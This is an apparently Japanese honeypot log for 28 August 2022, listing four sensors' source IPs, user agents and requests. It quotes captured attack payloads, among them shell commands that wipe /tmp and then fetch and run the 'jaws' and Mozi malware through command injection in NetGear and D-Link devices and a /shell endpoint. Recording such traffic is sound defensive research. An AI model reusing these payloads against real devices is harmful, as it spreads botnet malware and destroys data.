ハニーポット(仮) 観測記録 2022/08/28分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
/.envへのスキャン行為
Location:JP
WordPressへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws
Location:US
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws
Location:UK
F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:SG
D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget synns.cf/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:57 (前日比:-130)
US:総アクセス数:74 (前日比:10)
UK:総アクセス数:130 (前日比:56)
SG:総アクセス数:65 (前日比:-11)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.57.122.209 | Romania |
1 | 3.85.126.192 | United States |
1 | 20.56.165.78 | United States |
1 | 66.240.205.34 | United States |
16 | 95.214.235.205 | Ukraine |
2 | 109.237.103.9 | Russia |
1 | 128.1.248.42 | United States |
9 | 135.125.217.54 | France |
8 | 135.125.246.110 | France |
4 | 154.26.130.15 | United States |
1 | 156.193.237.212 | Egypt |
1 | 159.223.114.180 | United States |
1 | 159.223.122.31 | United States |
1 | 167.94.138.46 | United States |
1 | 167.248.133.61 | United States |
1 | 172.104.131.24 | United States |
1 | 172.104.242.173 | United States |
1 | 175.107.13.124 | Pakistan |
1 | 183.136.225.35 | China |
1 | 185.156.73.178 | Russia |
1 | 185.180.143.136 | Portugal |
1 | 192.241.222.4 | United States |
1 | 205.210.31.144 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
3 | Go-http-client/1.1 |
1 | Hello, world |
4 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
36 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | ABCDEFGHIJKLMNOPQRSTUVWXYZ9999 |
||
1 | Gh0st\xad |
||
1 | MGLNDD_18.179.20.5_80\n |
||
1 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
37 | GET | /.env |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /api/index/getline |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /showLogin.cc |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | GET | /wp-login.php |
HTTP/1.1 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.85.126.192 | United States |
1 | 20.168.113.78 | United States |
1 | 38.68.52.117 | United States |
1 | 41.34.122.169 | Egypt |
2 | 45.227.254.48 | Belize |
18 | 51.79.29.48 | Canada |
5 | 54.37.79.75 | France |
1 | 64.62.197.44 | United States |
1 | 85.215.209.170 | Germany |
3 | 109.206.241.17 | Bulgaria |
1 | 109.206.241.219 | Bulgaria |
2 | 109.237.103.9 | Russia |
1 | 128.14.134.134 | United States |
2 | 143.244.154.134 | United States |
1 | 147.182.181.147 | United States |
2 | 152.89.196.62 | Russia |
2 | 162.142.125.9 | United States |
2 | 162.142.125.220 | United States |
2 | 167.94.138.47 | United States |
2 | 167.94.138.63 | United States |
1 | 172.104.131.24 | United States |
1 | 172.104.242.173 | United States |
1 | 185.156.73.178 | Russia |
5 | 185.163.109.66 | Romania |
1 | 185.180.143.6 | Portugal |
9 | 185.254.196.223 | Ukraine |
1 | 192.241.208.87 | United States |
1 | 194.26.228.174 | Russia |
1 | 205.210.31.33 | United States |
1 | 205.210.31.145 | United States |
1 | 206.189.231.139 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
16 | - |
5 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
38 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | ABCDEFGHIJKLMNOPQRSTUVWXYZ9999 |
||
1 | MGLNDD_34.68.118.83_80\n |
||
1 | \x03\xaf\x1a\n |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
39 | GET | /.env |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /api/index/getline |
HTTP/1.1 |
6 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /showLogin.cc |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
5 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
4 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.85.126.192 | United States |
2 | 45.227.254.49 | Belize |
1 | 59.92.171.19 | India |
1 | 66.240.192.82 | United States |
1 | 74.207.248.79 | United States |
87 | 79.209.222.246 | Germany |
1 | 85.215.209.170 | Germany |
1 | 95.110.225.91 | Italy |
3 | 101.35.241.20 | China |
2 | 109.237.103.9 | Russia |
1 | 117.194.156.132 | India |
3 | 120.48.63.243 | China |
1 | 120.85.115.73 | China |
3 | 124.220.12.101 | China |
1 | 128.14.134.134 | United States |
1 | 149.3.111.247 | Georgia |
2 | 152.89.196.62 | Russia |
1 | 172.104.131.24 | United States |
1 | 172.104.242.173 | United States |
1 | 173.230.147.166 | United States |
1 | 184.105.139.69 | United States |
1 | 185.180.143.6 | Portugal |
8 | 185.254.196.223 | Ukraine |
1 | 190.180.154.40 | Argentina |
1 | 192.46.216.171 | United States |
1 | 192.241.213.196 | United States |
1 | 195.154.164.44 | France |
1 | 198.235.24.146 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
17 | - |
87 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
9 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
1 | ABCDEFGHIJKLMNOPQRSTUVWXYZ9999 |
||
1 | MGLNDD_132.145.66.34_80\n |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
5 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
9 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /api/index/getline |
HTTP/1.1 |
2 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
87 | GET | /phpmyadmin/ |
HTTP/1.1 |
3 | GET | /phpmyadmin/index.php |
HTTP/1.1 |
3 | GET | /phpmyadmin4.8.5/index.php |
HTTP/1.1 |
3 | GET | /pmd/index.php |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//149[.]3[.]111[.]247:33016/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /showLogin.cc |
HTTP/1.1 |
1 | GET | /v1/agent/self |
HTTP/1.1\n |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.85.126.192 | United States |
1 | 41.236.186.162 | Egypt |
2 | 45.227.254.53 | Belize |
17 | 51.79.29.48 | Canada |
5 | 54.37.79.75 | France |
1 | 64.62.197.32 | United States |
1 | 82.151.123.87 | Russia |
1 | 85.215.209.170 | Germany |
1 | 107.175.65.149 | United States |
2 | 109.237.103.9 | Russia |
1 | 125.41.83.69 | China |
1 | 143.244.154.134 | United States |
2 | 152.89.196.62 | Russia |
1 | 159.223.114.180 | United States |
2 | 162.142.125.220 | United States |
2 | 162.142.125.221 | United States |
1 | 162.221.192.26 | United States |
1 | 167.71.0.136 | United States |
2 | 167.94.138.119 | United States |
2 | 167.94.146.58 | United States |
1 | 172.104.242.173 | United States |
1 | 185.156.73.178 | Russia |
1 | 185.180.143.136 | Portugal |
1 | 185.220.101.175 | Germany |
9 | 185.254.196.223 | Ukraine |
1 | 192.241.205.157 | United States |
1 | 197.63.152.196 | Egypt |
1 | 198.235.24.15 | United States |
1 | 205.210.31.131 | United States |
1 | 206.189.231.139 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
14 | - |
4 | Go-http-client/1.1 |
2 | Hello, world |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
35 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | MGLNDD_13.67.44.234_80 |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
35 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /api/index/getline |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
7 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /showLogin.cc |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
4 | PRI | * |
HTTP/2.0 |